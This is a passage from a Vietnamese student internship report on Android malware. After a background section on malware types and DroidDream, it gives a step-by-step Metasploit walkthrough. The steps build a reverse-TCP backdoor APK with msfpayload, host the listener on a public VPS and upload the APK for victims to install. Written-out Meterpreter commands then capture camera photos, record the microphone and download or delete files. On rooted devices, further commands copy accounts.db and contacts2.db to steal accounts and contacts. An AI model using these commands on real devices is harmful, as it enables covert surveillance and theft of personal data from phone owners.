  • 25. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 25 1.6.3. Sự khác nhau về tính năng Android 2.3 Android 4.0 Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone và Tablet Chỉ có thể xóa tất các các thông báo cùng lúc trên trình quản lý Chỉ có thể xóa riêng rẽ các thông báo cùng lúc trên trình quản lý Chỉ có thể trả lời, ngắt cuộc gọi khi màn hình bị khóa Có thể thực hiện thêm 1 số tính năng khi màn hình bị khoái ngoài trả lời , ngắt cuộc gọi như gửi tin nhắn Không có tính năng mở khóa màn hình nhận diện khuôn mặt Có tính năng mở khóa màn hình nhận diện khuôn mặt Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhận diện được tất cả các camera trên thiết bị 1.6.4. Sự khác nhau về giao thức mạng Android 2.3 Android 4.0 Không hỗ trợ giao thức https Hỗ trợ giao thức https
  • 26. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 26 2. Nghiên cứu về mã độc trong mỗi trường android 2.1.Malware là gì? Malware (phần mềm độc hại) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc và thay đổi các thực thi của hệ điều hành cũng như các chương trình ứng dụng mà không có sự cho phép của người dùng và bằng một cách nào đó mà người dùng nếu không để ý cũng không thể phát hiện được những thay đổi đó. Hình 1. Phần mềm độc hại đã xuất hiện từ rất lâu trên những hệ điều hành máy tính như Windows, các máy tính MAC và Linux (ở một mức độ thấp hơn), và bây giờ nó đã trở thành một mối nguy hại không nhỏ cho các thiết bị di động chạy Android. Sự có mặt của Android khiến cho các phần mềm độc hại thêm phần thích thú, tích cực tấn công hơn tới đông đảo người dùng Android. Nói về vấn đề này, Timothy Armstrong, một chuyên gia bảo mật tại Kaspersky Lab, cho biết: “Malware trên Android được phát hiện nhiều hơn hầu như mỗi ngày. Thời gian gần đây, chúng tôi đã phát hiện ra ba nhà phát triển ứng dụng (mà có khi là từ cùng 1 người) với tên gọi MYOURNET, Kingmall2010, we20092020 đã cung cấp các ứng dụng để tải về miễn phí trên Android Market, mà hầu hết các ứng dụng đó đều chứa mã độc”. Hình 2.
  • 27. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 27 Năm 2012 là năm thứ hai cho thấy sự bùng nổ của phần mềm độc hại cho Android. Từ tám chương trình độc hại duy nhất vào tháng 1 năm 2011, tỷ lệ phát hiện trung bình hàng tháng phần mềm độc hại mới tấn công vào Android trong năm 2011 đã lên đến hơn 800 mẫu. Trong năm 2012, Kaspersky Lab đã xác định trung bình 6.300 mẫu phần mềm độc hại trên thiết bị di động mới mỗi tháng. Nhìn chung, trong năm 2012 số lượng mẫu độc hại cho Android được biết đến nhiều tăng hơn tám lần. 2.2.Phân loại Đa số các phần mềm độc hại Android có thể được chia thành ba nhóm chính dựa theo chức năng: - SMS Trojans: bòn rút tài khoản di động của các nạn nhân bằng cách gửi tin nhắn SMS đến các số điện thoại được đánh giá cao. - Backdoors: cung cấp truy cập trái phép vào smartphone, cài đặt các chương trình độc hại khác hoặc ăn cắp dữ liệu cá nhân của người dùng. - Cuối cùng là các phần mềm gián điệp nhằm mục tiêu thu thập trái phép dữ liệu cá nhân, chẳng hạn như sổ địa chỉ và mật khẩu (hoặc thậm chí hình ảnh cá nhân). Trong nửa đầu năm 2012, Backdoors, tin nhắn SMS, Trojans và phần mềm gián điệp chiếm 51% các phần mềm độc hại cho Android mới được phát hiện. Trong bảng xếp hạng Top Ten phần mềm độc hại cho Android đã bị chặn bởi Kaspersky Mobile Security hoặc Kaspersky Tablet Security, SMS Trojans là phổ biến nhất và các ứng dụng hiển thị quảng cáo không mong muốn cho người sử dụng ở vị trí thứ hai. Ít phổ biến rộng rãi nhưng nguy hiểm nhất là Trojans ngân hàng trên di động thường xuyên làm việc kết hợp với các máy tính để bàn, ví dụ như Carberp. Nền tảng Android cho phép cài đặt phần mềm từ các nguồn không tin cậy, và là một trong những cách tốt nhất để đảm bảo sự lây nhiễm từ việc cài đặt các chương trình từ những trang web đáng ngờ. Tuy nhiên, phần mềm độc hại trên nền tảng phân phối ứng dụng chính thức Google Play là một xu hướng bắt đầu vào năm 2011 và tiếp tục trong năm 2012, bất chấp những nỗ lực tốt nhất của Google để làm giảm hoạt động tội phạm mạng. Một trong những ví dụ “khác thường” nhất của phần mềm độc hại trên di động trong năm 2012 là "Find and Call", ứng dụng đã len lỏi được vào Google Play cũng như kho ứng dụng của Apple. 2.3.Cơ chế hoạt động của Malware Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware DroidDream. Malware này hoạt động qua 2 giai đoạn: Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụng chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên. Giai đoạn 2: Tự động cài đặt một ứng dụng thứ 2 với một giấy phép đặc biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác. Một khi DroidDream chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai, DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép. Nghiên cứu cài đặt HĐH Android trên các thiết bị laptop, smartphone.Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự
  • 28. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 28 động làm một số việc như là confirm, checkin….Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các công việc của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình. 2.4.Mục đích của Malware DroidDream DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của con DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS có khả năng tự gửi tin nhắn mà không cần sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng tăng lên một cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này. Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của người dùng hệ điều hành này. 2.5.Dấu hiệu bị nhiễm các phần mềm độc hại Cũng giống như trên máy tính, khi bị nhiễm malware, thiết bị Android của bạn sẽ có một số hành động khác thường và bạn không thể thay đổi được bất kỳ điều gì. - Sử dụng dữ liệu không rõ ràng: có rất nhiều phần mềm độc hại tồn tại để thu thập dữ liệu về tài khoản, số thẻ tín dụng, danh bạ, vv... Một khi có được các thông tin này, nó sẽ tự động được chuyển tiếp về cho người đã tạo ra nó. Và trong nhiều trường hợp, việc chuyển giao thông tin này sẽ dẫn đến sự khác lạ trong sử dụng dữ liệu. - Hiệu suất của thiết bị kém: tùy thuộc vào thời gian sử dụng và mức độ nghiêm trọng của việc lây nhiễm mà hiệu suất điện thoại của bạn sẽ bị giảm đi nhiều hay ít, đặc biệt là khi bạn đã khởi động lại thiết bị mà các vấn đề không được giảm bớt. - Thời lượng pin bị giảm: do hầu hết các phần mềm độc hại đều được thiết kế để chạy nền trong hệ thống, nên nó sẽ làm sụt giảm đáng kể thời lượng pin trên thiết bị của bạn.
  • 29. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 29 3. Xâm nhập android qua mạng local 3.1.Giới thiệu về Kali Linux Trong những năm qua BackTrack là hệ điều hành được sử dụng nhiều nhất bởi các chuyên gia đánh giá bảo mật. BackTrack bắt đầu xuất hiện vào năm 2006 và trong 7 năm qua nó đã không ngừng cải tiến để đạt được một vị trí nhất định trong cộng đồng bảo mật trên khắp toàn thế giới. Vì vậy, ngày nay thật khó để tìm thấy một người nào đó quan tâm đến an toàn thông tin mà chưa từng nghe về BackTrack. Tháng 3 năm 2013, Offensive Security đã tiến thêm một bước mới khi công bố phiên bản tiến hóa của hệ điều hành BackTrack, tên của nó là Kali (được xem như phiên bản BackTrack 6), Kali là tên nữ thần của người Hindu, hàm ý sự biến đổi và khả năng hủy diệt hay có lẽ là tên một môn võ thuật của người Philippine ... Để qua một bên chuyện tên với tuổi, Kali Linux là một OS rất hữu ích đối với những chuyên gia đánh giá bảo mật, một OS tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kỳ một chuyên gia đánh giá bảo mật nào cũng cần sử dụng đến khi tác nghiệp. - Ưu điểm và Nhược điểm: Đối với những người chưa biết BackTrack, nói một cách ngắn gọn BackTrack là một bản phân phối Linux dựa trên nền tảng hệ điều hành Ubuntu, với nhiều công cụ bảo mật được phân loại rõ ràng để sử dụng. 3.1.1. Kali phát triển trên nền tảng hệ điều hành Debian Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng. Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các công cụ. Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. 3.1.2. Hỗ trợ mạng không dây tốt hơn Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây. 3.1.3. Khả năng tùy biến cao Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.
  • 30. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 30 3.1.4. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái). Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa. 3.2.Cài đặt Kali Linux Trước tiên ta phải vào trang http://www.kali.org/downloads/ để download file ISO phiên bản mới nhất về Hình 3. Sau đó, ta bắt đầu cài cặt theo các bước bên dưới: Hình 4. Hình 5.
  • 31. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 31 Hình 6. Hình 7. Hình 8. Hình 9.
  • 32. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 32 Hình 10. Hình 11. Hình 12. Hình 13.
  • 33. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 33 Hình 14. Hình 15. Hình 16.
  • 34. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 34 Hình 17. Hình 18.
  • 35. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 35 Hình 19. Hình 20.
  • 36. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 36 Hình 21. Hình 22.
  • 37. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 37 Hình 23. Hình 24.
  • 38. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 38 Hình 25. Hình 26.
  • 39. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 39 Hình 27. Hình 28.
  • 40. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 40 Hình 29. 3.3.Metasploit framework trong Kali linux 3.3.1. Giới thiệu Metasploit framework là một framework mã nguồn mở phát triển nhằm sử dụng các shellcode (payload) để tấn công máy có lỗ hổng. Cùng với một số bộ công cụ bảo mật khác. Metasploit có cơ sở dữ liệu chứa hàng ngàn shellcode, hàng ngàn exploit của các hệ điều hành, các chương trình hay dịch vụ. Trong quá trình phát triển metasploit liên tục cập nhật các exploit... nên càng ngày nó càng trở thành một bộ công cụ mạnh mẽ. Metasploit framework là một bộ dự án sinh ra để kiểm tra độ an toàn, nhưng đối với những hacker thì nó thực sự là một công cụ vô cùng hữu ích (dùng để kiểm tra, khai thác lỗi, exploit…) 3.3.2. Sử dụng metasploit framework 3.3.2.1.Chọn module exploit: lựa chọn chương trình, dịch vụ lỗi mà metasploit có hỗ trợ để khai thác Muốn chọn ta có thể dùng lệnh "show exploits" để hiện ra tất cả các exploit mà metasploit framework có hỗ trợ. Để dùng exploit nào đó ta dùng câu lệnh "use name_exploit" .Trong đó tham số name_exploit là tên của exploit đc metasploit hỗ trợ. Để biết thêm các thông tin về exploit mà ta đã chọn có thể dùng lệnh "info name_exploit".
  • 41. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 41 Ví dụ: mình sử dụng một exploit sau khi đã liệt kê ra sẽ là: use windows/manage/add_user_domain 3.3.2.2.Cấu hình module exploit đã chọn Sau khi đã chọn một exploit với command use, việc tiếp theo là cấu hình các options mà exploit này yêu cầu. Để rõ hơn exploit này nó yêu cầu cấu hình như thế nào, phải cấu hình những gì, ta sử dụng lệnh "show options". Khi sử dụng lệnh show option ta thường nhận đc một bảng gồm các cột như sau: Name--------------Current Setting----------------Required---------------Description Trong đó, ở cột required nếu giá trị là "yes" thì ta phải set giá trị cho tham số này, còn nếu là "no" thì ta có thể set hoặc không. Quan trọng phải xem một số nó đã cấu hình mặc định cho rồi có thích hợp với chúng ta hay không. Ta dùng lệnh “set” để cấu hình những options của module đó. Ngoài ra nó còn có thêm một số options khác, dùng "show advanced", "show evasion" để xem. Sau khi cấu hình xong ta cần kiểm tra xem việc cấu hình đã đúng hay chưa. Để kiểm tra việc cấu hình ta dùng lệnh "check" để xem mục tiêu có bị tấn công được hay không. Đây là một cách nhanh để ta kiểm tra xem việt cấu hình các options bằng lệnh set có đúng hay không và mục tiêu thực sự có lỗ hổng để khai thác được hay không. Nhưng không phải tất cả các exploit đều thực sự có thể kiểm tra được bằng việc sự dụng lệnh check. Đôi khi ta phải thực sự exploit nó mới biết được. 3.3.2.3.Lựa chọn payload Payload là một đoạn code đc chạy trên máy victim, dùng để thực hiện một số họat động nào đó, hoặc dùng để kết nối về máy của hacker. Vậy làm sao để có cái payload này trên máy của victim? Có 2 phương pháp chủ yếu được dùng. Đó là gửi cho victim thông qua việc phân tính một lỗi, lỗ hổng nào đó trên hệ thống victim, từ đó đột nhập và đưa đoạn payload này vào máy victim. Kiểu thứ 2 là gửi trực tiếp cho victim, chờ đợi victim sơ ý nhận nó. Để hiện thị các payloads tích hợp cho exploit hiện tại chúng ta đang dùng, ta dùng lệnh "show payloads". Tương ứng với mỗi OS khác nhau ta dùng một payload khác nhau, và phương pháp cũng khác nhau. Các giao thức dùng cũng khác nhau... Nhìn chung đối với payload có thể phân ra làm 2 loại cơ bản đó là bind payload và reverse payload. Khi nào ta dùng loại nào? Đây cũng là một vấn đề quan trọng. Nếu như máy của chúng ta (đóng vai trò là hacker) đứng sau một tường lửa, thì lúc này ta nên dùng bind payload. Mở một port trên máy tính và kết nối trực tiếp từ máy hacker đến máy victim. Còn nếu như victim đứng sau một tường lửa, còn chúng ta thì không. Khi đó chúng ta dùng reverse payload để connect ngược từ máy victim về máy chúng ta. Như vậy cho thấy khi tấn công mục tiêu, ta phải tìm hiểu rõ ràng về mục tiêu, tìm kiếm tất cả các thông tin có thể có. Dựa vào đó mà ta chọn cách thích hợp.
  • 42. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 42 Khi ta quyết định chọn một payload nào đó, dùng lệnh "set PAYLOAD name_payload" để chọn payload cần dùng. Giả sử muốn dùng payload windows/meterpreter/reverse_ord_tcp thì ta thao tác là: set PAYLOAD windows/meterpreter/reverse_ord_tcp Ta nhận đc là: PAYLOAD => windows/meterpreter/reverse_ord_tcp Tượng tự để xem rõ thông tin, options về payload ta có thể dùng các lệnh như "show options", "info name_payload" ,"show advanced",… Sau khi thực hiện tất cả các thiết lập xong thì ta dùng lệnh "exploit" để xem kết quả. 3.4.Tấn công android dùng Metasploit Framework trong Kali Linux Trước tiên chúng ta sẽ tạo ra một backdoor bằng cách dùng lệnh: msfpayload android/meterpreter/reverse_tcp lhost=192.168.159.128 lport=8080 R > /root/Desktop/app.apk Hình 30. Trong đó 192.168.159.128 là địa chỉ ip của máy Kali.Chúng ta có thể xem nó bằng cách dùng lệnh: ifconfig
  • 43. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 43 Hình 31. Và đây là file app.apk mà chúng ta vừa tạo Hình 32.
  • 44. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 44 Tiếp theo chúng ta mở metasploit bằng cách dùng lệnh: msfconsole Hình 33. Chúng ta cài đặt các thông số cần thiết use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.159.128 set lport 8080 Với lhost và lport giống với khi chúng ta tạo file app.apk
  • 45. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 45 Hình 34. Ta mở một cái android ảo và tải về file app.apk, cài đặt và mở lên được giao diện như dưới, nhấp vào nút Reverse_tcp: Hình 35.
  • 46. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 46 Vậy là ta đã kết nối thành công tới máy android này, ở msfconsole sẽ như sau: Hình 36. Để xem thông tin về máy, nhập lệnh sysinfo - Sử dụng camera: Để xem danh sách camera, nhập webcam_list Hình 37.
  • 47. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 47 Để chụp hình bằng camera, nhập webcam_snap a với a là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau: Hình 38. - Ghi âm Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy Hình 39.
  • 48. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 48 - Lấy file từ sd card Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục Hình 40. Ta tải file app.apk trong thư mục Download của sdcard Dùng lệnh cd /sdcard/Download để vào thư mục Hình 41.
  • 49. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 49 Như trên hình, ta thấy 1 file là app.apk, để tải về máy, ta nhập lệnh download app.apk Hình 42. Và file này sẽ được tải về thư mục root của máy Kali 4. Thực hiện xâm nhập android thông qua mạng Internet 4.1.Giới thiệu về VPS 4.1.1. VPS là gì? Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều. Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị hack local. Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường. VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,….
  • 50. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 50 4.1.2. Đặc điểm về thông số VPS Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng. Tiết kiệm được nhiều chi phí so với việc thuê một server riêng. Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao… Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ thống. Có thể cài lại hệ điều hành với thời gian từ 5-10 phút. 4.1.3. Giá trị khi sử dụng VPS Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp. Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng. Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng. Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection. Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
  • 51. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 51 4.2.Cài đặt metasploit Để cài đặt metasploit trước tiên ta phải vào trang http://metasploit.com để tải bộ cài đặt metasploit về máy của mình. Ta nhấp vào phần Free Metasploit Download và nó sẽ hiện ra trang bên dưới Ở đây mình sẽ down bản METASPLOIT COMMUNITY. Hình 43. Sau khi nhấp vào link, nó sẽ xuất hiện một trang đăng kí. Mình nhập thông tin đầy đủ và nhấp vào SUBMIT & DOWNLOAD để nhận một license Hình 44.
  • 52. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 52 Tiếp theo nó sẽ xuất hiện trang download, ta sẽ chọn bản phù hợp. Hình 45. Sau khi tải xong, ta bắt đầu tiến trình cài đặt. Trước tiên ta nhấp vào bản cài đặt và nhấn Next Hình 46. Hình 47.
  • 53. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 53 Bên dưới ta chọn thư mục để cài đặt và nhấn Next Hình 48. Ta phải đảm bảo rằng các phần mềm diệt virut đều được đóng, nếu không nó sẽ ngăn cản việc cài đặt Hình 49.
  • 54. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 54 SLL Port, Server Name và Days of validity ta để mặc định Hình 50. Hình 51. Ta tiếp tục nhấn Next để bắt đầu cài đặt Hình 52. Hình 53.
  • 55. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 55 Cài đặt xong ta nhấp Finish để kết thúc việc cài đặt Hình 54. Sau khi kết thúc việc cài đặt, ta sẽ vào link http://localhost:3790/ để đăng kí tài khoản. Ta nhấp đầy đủ theo những yêu cầu bên dưới và nhấn Create Account Hình 55.
  • 56. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 56 Sau đó trình duyệt sẽ chuyển đến trang nhập key để active chương trình Hình 56. Ta vào địa chỉ mail mà ta đã sử dụng khi download bộ cài đăt metasploit, điền key vào và nhấn ACTIVE LICENSE Hình 57.
  • 57. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 57 Như vậy là ta đã có một tài khoản metasploit Hình 58. 4.3.Xâm nhập vào thiết bị android Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R> /root/Desktop/app.apk Trong đó 14.0.21.184 là địa chỉ máy VPS của ta. /root/Desktop/app.apk là đường dẫn chứa file vừa tạo. Hình 59.
  • 58. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 58 Sau khi tạo một backdoor được tạo, ta tải nó lên mạng. Khi máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới: Hình 60. Ta vào máy VPS và mở Metasploit Console lên Hình 61.
  • 59. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 59 Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một môi trường và liên kết với máy android mà ta sẽ tấn công: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 14.0.21.184 set lport 4444 run Ở đây lhost và lport phải giống với lhost và lport khi tạo backdoor Hình 62.
  • 60. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 60 Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đã kết nối Hình 63. Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android Hình 64.
  • 61. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 61 - Xem thông tin Ta dùng lệnh sysinfo để xem thông tin máy android Hình 65. - Xem camera Ta dùng lênh webcam_list để xem danh sách các camera Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android. Trong đó: x là 1: Back Camera 2: Front Camera Hình 66.
  • 62. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 62 Để di chuyển đến thư mục nào ta dùng lệnh cd <đường dẫn đến thư mục> Lệnh ls để xem trong thư mục có những gì Hình 67. Ta vào thư mục /sdcard/Download để down file về - Download file Ta dùng lệnh download <tên file> để down file đó về máy VPS của ta Hình 68.
  • 63. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 63 Muốn xóa một file ta dùng lệnh rm <tên file> Hình 69. - Đánh cắp tài khoản, danh bạ Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này phải được root trước đó. Ta dùng lệnh shell để vào hệ thống Dùng lệnh su để toàn quyền truy cập Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện thông báo là unknown uid 0 Hình 70.
  • 64. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 64 Ta gõ cd /data/system để vào thư mục system Tiếp theo gõ ls –l để xem trong thư mục có gì Hình 71. Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard Hình 72.
  • 65. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 65 Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh download file accounts.db về máy VPS của chúng ta Hình 73. Tiếp tục ta vào địa chỉ cd /data/data/com.android.providers.contacts/databases Để copy file contacts2.db về Sdcard bằng lệnh cp contacts2.db /sdcard Hình 74.
